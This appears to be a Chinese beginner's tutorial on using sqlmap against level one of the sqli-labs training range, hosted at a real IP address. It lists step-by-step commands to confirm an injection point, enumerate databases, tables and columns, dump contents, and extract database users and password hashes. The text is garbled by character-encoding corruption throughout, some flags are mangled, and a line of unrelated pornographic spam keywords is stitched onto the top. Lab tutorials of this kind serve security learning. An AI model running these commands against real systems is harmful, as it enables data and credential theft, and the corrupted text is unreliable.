欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQL注入之sqlmap入門學(xué)習(xí)

 更新時(shí)間:2023年05月10日 10:36:41   作者:菜鳥小權(quán)權(quán)  
本文主要介紹了SQL注入之sqlmap入門學(xué)習(xí),文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧

原來sql注入如此簡單

以SQL注入靶場(chǎng)sqli-labs第一關(guān)為例,進(jìn)行sqlmap工具的使用分享。

一、判斷是否存在注入點(diǎn)

使用命令:

使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"

有圖中白色背景的 則判斷出有注入點(diǎn)

二、查詢當(dāng)前用戶下所有數(shù)據(jù)庫

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五個(gè)表

三、獲取數(shù)據(jù)庫中的表名

選取一個(gè)challenges數(shù)據(jù)庫,獲取此庫的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables  

四、獲取表中的字段名

選取表T5M0QG6FM2,獲取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內(nèi)容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數(shù)據(jù)庫的所有用戶

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用該命令就可以列出所有管理用戶

七、獲取數(shù)據(jù)庫用戶的密碼

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當(dāng)前的數(shù)據(jù)庫是 security

九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的用戶名稱

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

當(dāng)前用戶是root

到此這篇關(guān)于SQL注入之sqlmap入門學(xué)習(xí)的文章就介紹到這了,更多相關(guān)sqlmap入門內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評(píng)論